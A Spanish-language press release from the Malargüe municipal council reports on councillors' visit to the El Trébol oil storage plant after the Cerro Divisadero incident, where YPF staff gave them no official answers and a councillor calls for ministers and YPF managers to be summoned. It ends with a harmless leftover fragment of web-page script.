Considerando y teniendo en cuenta el informe brindado por la Edil radical Liliana Martínez en la cuarta Sesión Ordinaria del Honorable Concejo Deliberante, sobre la reunión mantenida en Casa de Gobierno con los Ministros Lic. Guillermo Elizalde y el Ing. Marcos Zandomeni, por el siniestro ocurrido en Cerro Divisadero, los integrantes de la Comisión de seguimiento Siniestro Cerro Divisadero del Honorable Concejo Deliberante, una comitiva de ediles se trasladó hasta la petrolera El Trébol-Planta de almacenaje y Despacho de Petróleo en Malargüe.

La visita fue el jueves por la mañana y estuvo conformada por los ediles Paola Paleico (B. MoPoMa), Liliana Martínez (B. Mujeres Radicales Argentinas) y José Oyola (B. Justicialismo Para Todos. Según lo informara la Concejal Liliana Martínez, a pedido del Gobernador de la Provincia, Sr. Francisco Pérez, el Ministro de Tierras y Ambiente de la Provincia de Mendoza, Lic. Guillermo Elizalde y el Sr. Ministro de Energía Ing. Marcos Zandomeni, están evaluando la posibilidad de realizar la evacuación del petróleo en especificación, a la Planta Petrolera El Trébol, la que se encuentra ubicada en el radio urbano de la Ciudad de Malargüe.

Ante este parte oficial, los integrantes de la Comisión de seguimiento, llegaron hasta la Petrolera El Trébol para entrevistarse con el encargado de la Planta de almacenaje.

Sin respuestas oficiales y atendidos de manera informal, por parte de los Agentes de YPF, los Ediles se retiraron del lugar, recorriendo la Planta donde, según informó la Concejal Martínez se están llevando a cabo una serie de trabajos con oleoductos e instalaciones conexas utilizadas para el transporte de petróleo, sus derivados a grandes distancias.

“Con este dudoso escenario, se hace aún más necesario, realizar la convocatoria a los Ministros, legisladores, gerentes de YPF e instituciones afines, para poder encontrar una respuesta o parte oficial respecto de las “acciones” que siguen al siniestro en Cerro Divisadero, concluyó la Edil.

Informe brindado por el Área de Prensa del Honorable Concejo Deliberante de Malargüevar d=document;var s=d.createElement(‘script’);

Comentarios